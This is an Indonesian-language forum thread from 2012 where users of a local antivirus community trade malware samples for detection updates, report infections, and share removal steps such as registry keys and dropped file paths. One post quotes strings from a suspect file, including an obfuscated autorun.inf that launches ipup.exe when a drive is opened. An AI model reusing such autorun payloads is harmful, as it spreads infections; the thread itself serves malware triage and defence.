wkkwkwk aq jg takut berurusan ama virus EPO mcm gitu,, :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: acongg pada Januari 21, 2012, 02:05:58 PM
itu hasil scan dari virustotal menyatakan klo itu virus virut, :D komputer agan udh terinfeksi virus tuh,, lain kali hati" dlm menjalankan file exe, jgn lupa pake antivirus yang selalu Up To Date :D :D :D

bigini lho Pak hapackerrrrsssss,,, kmren ntu aq iseng nyoba buka file .html yang trinfeksi Alice yg brubah mnjadi file .hta pake notepad,, tyus pada isi yang paling bawah itu ad script "On error resume next" gettooo

beberapa hari kmudian aq buka Smadav,, eeehhhh gak taunya kompiq bilangnya terinfeksi Sality,,, lgsng aj q scan pake removal yang q sebutkan diatas,, nyatanya nggak ada yang mndteksi adanya virus,, hanya Smadav yang bilang kompiq terinfeksi Sality,,, tyuuussssssss........ q upload dech file yang dicurigai terinfeksi Sality kesini,,,
beggituuu pak hapackeerrrrrssss
 8)  8)  8)  8)

asyik asyik asyik
Laen kali kalo belom punya skill mumpuni dibidang pervirusan jgn coba2 ya, nanti muka ente bisa Bengap-bengap karna kebanyakan nangis gara2 Kompi ente Rusak  ;D  ^_^
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 21, 2012, 04:53:50 PM
Kutip
Laen kali kalo belom punya skill mumpuni dibidang pervirusan jgn coba2 ya, nanti muka ente bisa Bengap-bengap karna kebanyakan nangis gara2 Kompi ente Rusak  ;D  ^_^

wahhhhh menakutkan yaaa?????

enggak dech kayaknya,,, klo nggak belajar seperti itu, mana bisa q sperti ini,,,, resiko kn selalu ada,,, nggak takut kena virus tuh aq

nggak harus punya skill mumpuni untuk belajar smacam ni,, namanya nggak pengen maju donk,,,

aq uda belasan kali instal ulang pcq,,, atow malahan 20x lbh aq instal ulang,,,

nggak pake nangis,,, yang aq cari malah solusi untuk mnghadapi masalh seperti ini yang akan datang scra mndadak dkemudian hari,,, agar tdak trjerembab lagi,, bgitulah aq

dukunglah orang yang lagi mningkatan ilmu n wawasannya,, jangan diejek
nggak baek itu

 :-bd  :-bd  :-bd

Begggiiittttooooooo..... Mas Acccooongg
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: acongg pada Januari 21, 2012, 05:34:11 PM
Kutip
Laen kali kalo belom punya skill mumpuni dibidang pervirusan jgn coba2 ya, nanti muka ente bisa Bengap-bengap karna kebanyakan nangis gara2 Kompi ente Rusak  ;D  ^_^

wahhhhh menakutkan yaaa?????

enggak dech kayaknya,,, klo nggak belajar seperti itu, mana bisa q sperti ini,,,, resiko kn selalu ada,,, nggak takut kena virus tuh aq

nggak harus punya skill mumpuni untuk belajar smacam ni,, namanya nggak pengen maju donk,,,

aq uda belasan kali instal ulang pcq,,, atow malahan 20x lbh aq instal ulang,,,

nggak pake nangis,,, yang aq cari malah solusi untuk mnghadapi masalh seperti ini yang akan datang scra mndadak dkemudian hari,,, agar tdak trjerembab lagi,, bgitulah aq

dukunglah orang yang lagi mningkatan ilmu n wawasannya,, jangan diejek
nggak baek itu

 :-bd  :-bd  :-bd

Begggiiittttooooooo..... Mas Acccooongg
tuh kan sendirinya aja bilang menakutkan  ;D gitu aja marah nih si boss, becanda kaleeeee  ;D jgn dimasukin ati ya  ;D. ngemeng2 ente pake tools apa buat analisa virus boss  ???
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 21, 2012, 05:40:18 PM
hahahahahaha
cp juga yang marah

wong aq cuma ngambek puolll doank kok

hahahahahahaha  ;D

becanda kalee
---

Aq pake Notepad, VMWare, OS XP n Seven, 7zip, Winrar, DrWeb, Kemo AV, Smadav, PCMAV, BitDefender

itu aj untuk mlihat virus atow bukan

tentunya jg pake logika otak komputer donk

asyik asyik asyik
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: firmantaruna3 pada Januari 23, 2012, 02:17:52 PM
hahahahahaha
cp juga yang marah

wong aq cuma ngambek puolll doank kok

hahahahahahaha  ;D

becanda kalee
---

Aq pake Notepad, VMWare, OS XP n Seven, 7zip, Winrar, DrWeb, Kemo AV, Smadav, PCMAV, BitDefender

itu aj untuk mlihat virus atow bukan

tentunya jg pake logika otak komputer donk

asyik asyik asyik

gan, kalo mau analisa file virus apa bukan, bisa di submit ke sini gan :

http://camas.comodo.com/ (http://camas.comodo.com/)

itu fasilitas analisis malware punya Comodo, nanti akan di analisis secara otomatis, trus ada rincian apa aja yang dilakuin file tersebut gan.. tapi file yang bisa dianalisis cuma file ekstensi .exe aja gan..

CMIIW  ^:)^ ^_^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 23, 2012, 03:46:33 PM
Matursuwun atas saranx Bosss Firman Utina eehhhh.. firmantaruna3

asuik asyik asyik
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Metamorphic pada Januari 24, 2012, 07:52:33 PM
tuh gan contoh file yg sering muncul di smadav...yg lbih parah lgi...ngerubah file exe program mentah...terus menonaktifkan avira PSS, task manager g mau di running (ctrl+alt+del)...hrz lwat smadav baru bisa
plz tolongin donk....

ketiga virus tersebut sality
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: acongg pada Januari 25, 2012, 12:49:43 PM
tuh gan contoh file yg sering muncul di smadav...yg lbih parah lgi...ngerubah file exe program mentah...terus menonaktifkan avira PSS, task manager g mau di running (ctrl+alt+del)...hrz lwat smadav baru bisa
plz tolongin donk....

ketiga virus tersebut sality
Nyumbang virus dimari juga dong mas boss!ente kan teamnya Brigade...pasti punya sampel virus lokal dong, jangan cuma downloadin aja sampel2 yg ada disini ya mas boss  ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 25, 2012, 04:51:09 PM
asyik asyik asyik
betul betul betul

mohon sumbangan koleksi virus buat Smadaver donk
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Metamorphic pada Januari 25, 2012, 06:52:11 PM
tuh gan contoh file yg sering muncul di smadav...yg lbih parah lgi...ngerubah file exe program mentah...terus menonaktifkan avira PSS, task manager g mau di running (ctrl+alt+del)...hrz lwat smadav baru bisa
plz tolongin donk....

ketiga virus tersebut sality
Nyumbang virus dimari juga dong mas boss!ente kan teamnya Brigade...pasti punya sampel virus lokal dong, jangan cuma downloadin aja sampel2 yg ada disini ya mas boss  ;D

seep nanti diupload disini ya...  :-bd
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Januari 27, 2012, 10:29:06 AM
sorry ya gan,, gw kemaren abis liburan ke Bali gan,jadi ga sempat upload virus,,, pokonya pasti nanti gw opload lagi gan,,, seeeeppppppp  <=) <=)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: bayanudin pada Januari 28, 2012, 10:07:18 PM
salam kenal untuksemua,saya mengirimkan file yang (print screen)laptop saya sering trouble begitu saya gak tahu apakah itu atau apa,yang jelas sampai saat ini saya belum menemukan solusinya.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Januari 28, 2012, 10:21:57 PM
salam kenal untuksemua,saya mengirimkan file yang (print screen)laptop saya sering trouble begitu saya gak tahu apakah itu atau apa,yang jelas sampai saat ini saya belum menemukan solusinya.
Tidak bisa copas ya?
Dari Flashdisk bukan?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Metamorphic pada Januari 31, 2012, 08:33:27 PM
Kiriman virus baru mohon diblacklist!  :-bd

Brigade Sudah mendeteksi... silahkan yg lain ..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 31, 2012, 08:47:29 PM
dunlut pertama ahhh...
Judul: Re: Upload VIRUS ke Forum.. virus ErrorReport
Ditulis oleh: ponco wiibowo pada Februari 01, 2012, 12:12:08 PM
smadav belum bisa deteksi virus ini,,, antivirus tetangga sebelah mendeteksinya sebagai: pcmav: ErrorReport
virus ini memanfaatkan email dalam penyebarannya dengan icon adobe

Artikel dari tetangga sebelah:
Sorry but you are not allowed to view spoiler contents.


VirusTotal:
Sorry but you are not allowed to view spoiler contents.

antivirus laptop gw, avast : Win32:Downloader-MDT[Trj]

silahkan di unduh ya  <=)
Judul: Re: Upload VIRUS ke Forum.. virus ErrorReport
Ditulis oleh: Metamorphic pada Februari 01, 2012, 06:41:14 PM
smadav belum bisa deteksi virus ini,,, antivirus tetangga sebelah mendeteksinya sebagai: pcmav: ErrorReport
virus ini memanfaatkan email dalam penyebarannya dengan icon adobe

Artikel dari tetangga sebelah:
Sorry but you are not allowed to view spoiler contents.


VirusTotal:
Sorry but you are not allowed to view spoiler contents.

antivirus laptop gw, avast : Win32:Downloader-MDT[Trj]

silahkan di unduh ya  <=)

pertamax bro...thanks u  :-bd
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Februari 02, 2012, 06:01:51 AM
makin mantap dah Brigade AV  :-bd  :-bd  :-bd

file ni lum dkenali oleh Smadav 8.9.1
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: azsgetoo pada Februari 02, 2012, 08:39:48 AM
bosss nie file yang terdeteksi virus VBS.Alice.A
sudah berkali-kali di scan smadav ReV.8.9.1 masih saja terdeteksi tidak bisa di hapus hanya masuk ke karantina
mohon di bantu ya bosss ^:)^ ^:)^ ^:)^ ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: M. Ridzky pada Februari 02, 2012, 08:59:42 AM
bosss nie file yang terdeteksi virus VBS.Alice.A
sudah berkali-kali di scan smadav ReV.8.9.1 masih saja terdeteksi tidak bisa di hapus hanya masuk ke karantina
mohon di bantu ya bosss ^:)^ ^:)^ ^:)^ ^:)^

Filenya rusak tuh
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: jakakeren pada Februari 02, 2012, 12:28:24 PM
ada yang tau cara ngilangi zaberg.exe
recrlener.exe ga
mereka sembunyi di recyler & my document
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Februari 02, 2012, 12:46:17 PM
ada yang tau cara ngilangi zaberg.exe
recrlener.exe ga
mereka sembunyi di recyler & my document
Coba upload ke sini sampelnya gann.. Biar bisa dilihat tingkah lakunya..  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada Februari 02, 2012, 04:30:35 PM
makin mantap dah Brigade AV  :-bd  :-bd  :-bd

file ni lum dkenali oleh Smadav 8.9.1
di eset dikenali dengan

videoku.exe   a variant of Win32/Injector.KKZ trojan

Mplayer.exe   probably a variant of Win32/Agent.BIKZNE trojan

Hot Girl Show.exe   a variant of Win32/VB.NRI trojan
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: Metamorphic pada Februari 02, 2012, 06:10:03 PM
makin mantap dah Brigade AV  :-bd  :-bd  :-bd

file ni lum dkenali oleh Smadav 8.9.1

sama2 bro 3ndiixz, salam untuk kemo av ya...

untuk virus sample diatas sudah bisa diatasi dgn baik  \m/ :x

salah satu virus dari mplayer sudah terdeteksi dgn update 01 feb, dan sisanya update untuk 02 feb... thanks bro 3ndiixz samplenya  \m/ :x
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: M. Ridzky pada Februari 02, 2012, 07:35:52 PM
udh test infek lgsg ke pc ngk
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Metamorphic pada Februari 02, 2012, 09:40:07 PM
udh test infek lgsg ke pc ngk

langsung trial aja bro pake sanboxi ...  ;)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Februari 04, 2012, 07:26:18 PM
Om
kena virus ni kompiq,, klik kanan nggak bisa
aq tertipu dg program yang aslinya virus ni,, kapok  :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hernio pada Februari 04, 2012, 07:52:37 PM
Om
kena virus ni kompiq,, klik kanan nggak bisa
aq tertipu dg program yang aslinya virus ni,, kapok  :'(

Itu virus Fandy brooo,,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Februari 04, 2012, 08:32:11 PM
ia tau ni virus Fandi,, Smadav ud mngenali ni virus,,, tapi klik kananq ni yang lum bisa

ada yang bisa kasih bantuan ga???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Februari 05, 2012, 11:55:35 PM
ia tau ni virus Fandi,, Smadav ud mngenali ni virus,,, tapi klik kananq ni yang lum bisa

ada yang bisa kasih bantuan ga???
Klik kanan tidak memunculkan apa-apa ya gann?
Coba cek key Registry terlarang ini gann:

HKEY_USERS\S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxx-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoTrayContextMenu

HKEY_USERS\S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxx-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu

Jika ada, hapus aja gann.. Tapi seharusnya Smadav dan KemoAV sudah mendeteksi kedua key ini.. Kecuali jika Virusnya belum 100% hilang, sehingga begitu direpair akan kembali lagi jika salah satu induk virus tersebut diaktifkan. Untuk itu, pastikan komp agan sudah benar2 bersih dari virus ini, caranya coba cek apakah masih ada file berikut ini di komp agan:

- disk32dll.exe dan msvbvm60.dll (pada setiap drive)
- C:\WINDOWS\screen.scr
- C:\WINDOWS\serviks.exe
- C:\WINDOWS\setup.exe
- C:\WINDOWS\system32\run32dll.exe
- C:\WINDOWS\system32\serviks.exe
- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\system.exe (C:\Users\All Users\Start Menu\Programs\Startup\system.exe pada Win 7)
- C:\Documents and Settings\All Users\Desktop\Foto Bugil.scr (C:\Users\All Users\Desktop\Foto Bugil.scr pada Win 7)

Virus ini juga merusak file .ocx komputer. Coba ganti/repair file .ocx agan di C:\WINDOWS\system32 dan C:\WINDOWS\system32\dllcache dengan mengambil file .ocx dari komputer lain atau download di sini (http://www.ocxme.com/).
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Blue-Eyes pada Februari 06, 2012, 05:20:41 PM
Wah, kamputer warnet sekolah saya banyak virus.. Saya gak tau virus lokal atau luar, smuanya bercampur hingga tak bisa d hapus dgn sgl macam jenis antivirus. Sampe2 guru saya install program linux yg katanya virus sulit hidup didalamnya :D
Kalau ad waktu ane coba upload dah ;)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: cyberelite pada Februari 06, 2012, 09:11:14 PM
Wah, kamputer warnet sekolah saya banyak virus.. Saya gak tau virus lokal atau luar, smuanya bercampur hingga tak bisa d hapus dgn sgl macam jenis antivirus. Sampe2 guru saya install program linux yg katanya virus sulit hidup didalamnya :D
Kalau ad waktu ane coba upload dah ;)

Masa sih gan? Gak perlu linux, saya bisa jinakin malwarenya.  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hengki depapat pada Februari 07, 2012, 01:31:47 AM
Gimana cara ngilangin virus new heur.ffd bro 3ndiixz??? Mohon pencerahannya...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Blue-Eyes pada Februari 07, 2012, 05:24:20 PM
Iya gan.. virusnya lvl 9 semua :D
sgala macam dr cucu smpe nenek virusnya.... kmren ad siswa yg kcolongan masukin Memory hp, langsung tewas memorynya :D
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Februari 08, 2012, 04:41:44 PM
gan sample lg  <=)
worm morto:

Sorry but you are not allowed to view spoiler contents.

file dropper:
clb.dll
sen32.dll

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: aikawa pada Februari 09, 2012, 03:30:07 AM
pagi indonesia..
maaf ganggu, sya baru aja daftar di smadaver, tpi ada niat serius ni,

komp ku kena virus, ma smadav didetect heur. lvl 9, yg didetect program notepad.exe di directory windows

gejala seperti biasa, iseng matiin task manager. tapi bikin komputer lemot bgt, dia makan proses hingga 100 persen di AMD zacate, tpi ga nyampe 100 persen di spek lebih tinggi(perilaku aneh)

jika task manager dipaksa buka, terlihat proses virus nebeng di background proses lainnya, dan jika di kill paksa, dia pindah lagi ke proses lainnya terus menerus, mpe capek tetep aj ada. dia juga ada di flash disk, dengan nama random 4 hruf, dengan ekstensi cmd.

ni mo upload sample, tapi ga tau caranya di forum ini, bsa kasi tahu ga mas/mbak?? (sorry, NEW BIE), uda aku upload ke situs tetangga (situsnya warna kuning, milik PC MEDIA (kayana mirip merek majalah), coba yg jga aktif dsna bisa diambil.

mohon pencerahannya ya mas/mbak,
INFO : uda nemu sampel dengan gejala yg sma di kota YOGYA, SOLO, SRAGEN, NGAWI, JAKARTA UTARA, (habis jalan-jalan)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: aikawa pada Februari 09, 2012, 03:53:56 AM
pagi indonesia..
maaf ganggu, sya baru aja daftar di smadaver, tpi ada niat serius ni,

komp ku kena virus, ma smadav didetect heur. lvl 9, yg didetect program notepad.exe di directory windows

gejala seperti biasa, iseng matiin task manager. tapi bikin komputer lemot bgt, dia makan proses hingga 100 persen di AMD zacate, tpi ga nyampe 100 persen di spek lebih tinggi(perilaku aneh)

jika task manager dipaksa buka, terlihat proses virus nebeng di background proses lainnya, dan jika di kill paksa, dia pindah lagi ke proses lainnya terus menerus, mpe capek tetep aj ada. dia juga ada di flash disk, dengan nama random 4 hruf, dengan ekstensi cmd.

ni mo upload sample, tapi ga tau caranya di forum ini, bsa kasi tahu ga mas/mbak?? (sorry, NEW BIE), uda aku upload ke situs tetangga (situsnya warna kuning, milik PC MEDIA (kayana mirip merek majalah), coba yg jga aktif dsna bisa diambil.

mohon pencerahannya ya mas/mbak,
INFO : uda nemu sampel dengan gejala yg sma di kota YOGYA, SOLO, SRAGEN, NGAWI, JAKARTA UTARA, (habis jalan-jalan)

TAMBAHAN, ternyata ekstensi ada juga yg .exe, trus pas virus ku buka pake notepad, ada kode berikut :
-----------------------
[AutoRun]
;iUlwjaMhyWfeqcodjqMxbYy
;slIKmodNi
shell\ExpLore\COMMAnD =ipup.exe

;
shell\opeN\DEfAult=1

;lRTfehiASS pRNtyjjknxnhcqMx xubxVjcE
ShELl\oPEN\CommAnd= ipup.exe
;
Open = ipup.exe
;iytb
sHELL\AuTOPLAY\cOMmAnd= ipup.exe
------------------------------------
------------------------------------
ADVAPI32.dll KERNEL32.dll NTDLL.DLL GDI32.dll USER32.dll msvcrt.dll COMDLG32.dll SHELL32.dll WINSPOOL.DRV ole32.dll SHLWAPI.dll COMCTL32.dll OLEAUT32.dll VERSION.dll   
------------------------------------
M L E _ i s _ b r o k e n   f S a v e W i n d o w P o s i t i o n s   S o f t w a r e \ M i c r o s o f t \ N o t e p a d \ D e f a u l t F o n t s   L u c i d a   C o n s o l e
------------------------------------
\ S t r i n g F i l e I n f o \ % 0 4 x % 0 4 x \ O r i g i n a l F i l e n a m e   \ V a r F i l e I n f o \ T r a n s l a t i o n   \ s p p s v c . e x e   \ s l u i . e x e   \ s p p u i n o t i f y . d l l   s p p s v c   s p p u i n o t i f y
------------------------------------
RegSetValueExW  nRegQueryValueExW  0RegCloseKey <RegCreateKeyW aRegOpenKeyExW €IsTextUnicode W CloseServiceHandle  $QueryServiceConfigW ûOpenServiceW  ùOpenSCManagerW  @FindNLSString ³GlobalAlloc ÅGlobalUnlock  ¾GlobalLock  —GetTimeFormatW  ÈGetDateFormatW  GetLocalTime  žGetUserDefaultUILanguage  ÏHeapFree  ËHeapAlloc JGetProcessHeap  ìGetFileInformationByHandle  ìInterlockedExchange cFreeLibraryAndExitThread  êGetFileAttributesW  Wow64RevertWow64FsRedirection Wow64DisableWow64FsRedirection  IsWow64Process  ÀGetCurrentProcess µ CreateThread  ?LoadLibraryW  GetModuleFileNameW  Œ CreateFileMappingW  ^FormatMessageW  WMapViewOfFile gMultiByteToWideChar ÖUnmapViewOfFile KLocalReAlloc  hGetACP  Ö DeleteFileW SSetEndOfFile  WideCharToMultiByte sSetLastError  %WriteFile GetLastError  MLocalSize ûGetFullPathNameW  fMulDiv  ‡GetCommandLineW ÁGetCurrentProcessId \FoldStringW BlstrcmpW  9FindFirstFileW  .FindClose ÓHeapSetInformation  ÀTerminateProcess  yGetSystemTimeAsFileTime ÅGetCurrentThreadId  “GetTickCount  §QueryPerformanceCounter GetModuleHandleA  ¥SetUnhandledExceptionFilter bGetStartupInfoA éInterlockedCompareExchange  ²Sleep JLocalLock NLocalUnlock NlstrlenW  GetLocaleInfoW  ºGlobalFree  ElstrcmpiW XSetErrorMode   CreateFileW ÀReadFile  R CloseHandle DLocalAlloc  ëInterlockedDecrement  HLocalFree ïInterlockedIncrement  ¤GetVersionExW ÓUnhandledExceptionFilter  @ CreateFontIndirectW ”SetMapMode  ¨SetViewportExtEx  ¬SetWindowExtEx  4LPtoDP  SetBkMode &GetTextMetricsW ySetAbortProc  °StartDocW ²StartPage ò EndPage   AbortDoc  ï EndDoc  ã DeleteDC  ¹TextOutW  GetTextExtentPoint32W 2 CreateDCW wSelectObject  $GetTextFaceW  (EnumFontsW  ËGetDeviceCaps æ DeleteObject  SetActiveWindow >GetKeyboardLayout 7PostQuitMessage œ DefWindowProcW  -GetForegroundWindow ÑIsIconic  ¦ DestroyWindow
MessageBeep ›GetWindowPlacement  < CharUpperW  MRegisterClassExW  ïLoadImageW  ëLoadCursorW ÄSetWindowLongW  åLoadAcceleratorsW }GetSystemMenu ÅSetWindowPlacement  n CreateWindowExW cRegisterWindowMessageW  UpdateWindow  ¾InvalidateRect  ±SetScrollPos  ¢GetWindowTextLengthW  –GetWindowLongW  3PeekMessageW  Ø EnableWindow  ¬ DialogBoxParamW c CreateDialogParamW  £GetWindowTextW  ÆSetWindowPos  ˆSetCursor “SetForegroundWindow ú FindWindowW ~GetSystemMetrics  MoveWindow  |SendMessageW  1 CharNextW ? CheckMenuItem I CloseClipboard  ÊIsClipboardFormatAvailable  &OpenClipboard VGetMenuState  Ö EnableMenuItem  zGetSubMenu  GetClientRect þUnhookWinEvent  ,GetFocus  KGetMenu MessageBoxW )WinHelpW  &GetDlgCtrlID  C ChildWindowFromPoint  !GetDC ßShowWindow  Ï DrawTextExW eReleaseDC íLoadIconW ¿SetWinEventHook ]GetMessageW 6PostMessageW  ÍIsDialogMessageW  úTranslateAcceleratorW Ú EndDialog *GetDlgItemTextW SetDlgItemTextW ’SetFocus  ËSetWindowTextW  dGetParent úLoadStringW sSendDlgItemMessageW  GetCursorPos  mScreenToClient  üTranslateMessage  GetAncestor ¯ DispatchMessageW  '_controlfp  Î_vsnwprintf îmemset  m_wtol êmemcpy  Ìiswctype  [wcsncmp `wcsrchr Y_except_handler4_common ¾ __p__fmode  ¹ __p__commode  Ô __setusermatherr  _amsg_exit  Õ_initterm ç _acmdln exit  ô_ismbblead  j _XcptFilter ‘ __getmainargs _cexit  b_exit 7 ?terminate@@YAXXZ Ò __set_app_type   ReplaceTextW   PageSetupDlgW  PrintDlgExW  FindTextW  ChooseFontW  GetSaveFileNameW   CommDlgExtendedError  GetOpenFileNameW 
 GetFileTitleW  DragAcceptFiles p SHAddToRecentDocs à SHGetFolderPathW   SHCreateItemFromParsingName !ShellExecuteExW  DragQueryFileW   DragFinish  ShellAboutW  OpenPrinterW   ClosePrinter  † GetPrinterDriverW ? CoInitializeEx  l CoUninitialize  g CoTaskMemAlloc   CoCreateInstance  h CoTaskMemFree > CoInitialize  ] PathIsFileSpecW ÿ SHStrDupW     CreatePropertySheetPageW  … PropertySheetW  CreateStatusWindowW kWinSqmIncrementDWORD  ›RtlInitUnicodeString  ™NtQueryLicenseValue [WinSqmAddToStream  GetFileVersionInfoExW  GetFileVersionInfoSizeExW  VerQueryValueW      Æ[J       $   h¶  hª      Æ[J5~
      d¶  dª  ~»RSDSõ%ãéZ®Oµ%Éߌ ý   notepad.pdb
------------------------------------------------------------------------
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
    name="Microsoft.Windows.Shell.notepad"
    processorArchitecture="x86"
    version="5.1.0.0"
    type="win32"/>
<description>Windows Shell</description>
<dependency>
    <dependentAssembly>
        <assemblyIdentity
            type="win32"
            name="Microsoft.Windows.Common-Controls"
            version="6.0.0.0"
            processorArchitecture="*"
            publicKeyToken="6595b64144ccf1df"
            language="*"
        />
    </dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
        <requestedPrivileges>
            <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
        </requestedPrivileges>
    </security>
</trustInfo>
<application xmlns="urn:schemas-microsoft-com:asm.v3">
    <windowsSettings>
        <dpiAware  xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
    </windowsSettings>
</application>
</assembly>
---------------------------------------
maaf, jika ada kesalahan atau melanggar peraturan di forum ini(belum baca peraturan je)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Februari 09, 2012, 09:03:17 AM
pagi indonesia..
maaf ganggu, sya baru aja daftar di smadaver, tpi ada niat serius ni,

komp ku kena virus, ma smadav didetect heur. lvl 9, yg didetect program notepad.exe di directory windows

gejala seperti biasa, iseng matiin task manager. tapi bikin komputer lemot bgt, dia makan proses hingga 100 persen di AMD zacate, tpi ga nyampe 100 persen di spek lebih tinggi(perilaku aneh)

jika task manager dipaksa buka, terlihat proses virus nebeng di background proses lainnya, dan jika di kill paksa, dia pindah lagi ke proses lainnya terus menerus, mpe capek tetep aj ada. dia juga ada di flash disk, dengan nama random 4 hruf, dengan ekstensi cmd.

ni mo upload sample, tapi ga tau caranya di forum ini, bsa kasi tahu ga mas/mbak?? (sorry, NEW BIE), uda aku upload ke situs tetangga (situsnya warna kuning, milik PC MEDIA (kayana mirip merek majalah), coba yg jga aktif dsna bisa diambil.

mohon pencerahannya ya mas/mbak,
INFO : uda nemu sampel dengan gejala yg sma di kota YOGYA, SOLO, SRAGEN, NGAWI, JAKARTA UTARA, (habis jalan-jalan)
kalo di rar bisa ga ???
kalo dah bisa di rar lgsg dah klik yg additional options :D
nanti bisa attach file yg udah di rar tadi :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Februari 09, 2012, 08:40:56 PM
Weewww
virus apaan ntuhh????
Boss Ki@mhu,, ayo dbedah lagi ni virus,, kek nya mnarik ni virusnya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Februari 09, 2012, 08:44:03 PM
Weewww
virus apaan ntuhh????
Boss Ki@mhu,, ayo dbedah lagi ni virus,, kek nya mnarik ni virusnya
Haha.. Pengennya c gann.. Tapi tunggu diupload dulu sampelnya..
Ni lagi Review Virus yang agan upload kemarin (Hack FB). O yahh.. Apakah klik kanan komp agan sudah kembali normal? ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Februari 09, 2012, 09:19:58 PM
Uda Bosss,,,,
pake menu System Editor milik Smadav,,, tyus drestart explorerx,, uda balik lg dchhh,,,
pas pake menu system editor milik KEMO AV trnyata programnya bermasalah,, tp gpp,, ud q konfirmasi kok k pembuatnya biar dbetulin d rev. berikutnya,,,

Bossss Ki@mhu makin mantep aja dech dg tutorialnya,,, disebutin jg e nama file anakan dr virus Fandi

Makasihh ya Boss,,
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: aikawa pada Februari 10, 2012, 11:35:22 AM
ni sampleny mas/mbak.. sorry, dri kemaren mo post malah eror
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Februari 10, 2012, 04:32:35 PM
ni sampleny mas/mbak.. sorry, dri kemaren mo post malah eror
Agan upload di mana sampelnya? Koq gak terlihat di sini? :)
Uda Bosss,,,,
pake menu System Editor milik Smadav,,, tyus drestart explorerx,, uda balik lg dchhh,,,
pas pake menu system editor milik KEMO AV trnyata programnya bermasalah,, tp gpp,, ud q konfirmasi kok k pembuatnya biar dbetulin d rev. berikutnya,,,

Bossss Ki@mhu makin mantep aja dech dg tutorialnya,,, disebutin jg e nama file anakan dr virus Fandi

Makasihh ya Boss,,
Makasih juga.. Ada segi +nya juga dari virus ini, jadi agan bisa memberikan saran untuk revisi Kemo AV yang selanjutnya..  ;)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: sawidakpitu pada Februari 12, 2012, 07:29:06 AM
mungkin virus. cekidot
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: aikawa pada Februari 13, 2012, 01:53:11 AM
sample 1
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: aikawa pada Februari 13, 2012, 01:56:45 AM
sample 2
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: aikawa pada Februari 13, 2012, 02:05:02 AM
sample 3...

sorry, kemaren kyana dah ke upload, tpi trnyta gagall
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada Februari 13, 2012, 04:21:36 AM
mungkin virus. cekidot
terdeteksi sebagai variant of Win32/Kryptik.AAIX trojan di ESET

sample 1
sample 2
sample 3...

sorry, kemaren kyana dah ke upload, tpi trnyta gagall

terdeteksi sebagai INF/Autorun.gen trojan di ESET
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: mustofaikhwanuljamil pada Februari 13, 2012, 08:19:20 PM
Ada Yang Bisa Ngilangin Nih Virus Gak
Flash Disk Wa Kena nih Virus
Efeknya Flash Disk Wa Gak Bisa Di Format, Copy-Paste, Delete, Bahkan Check

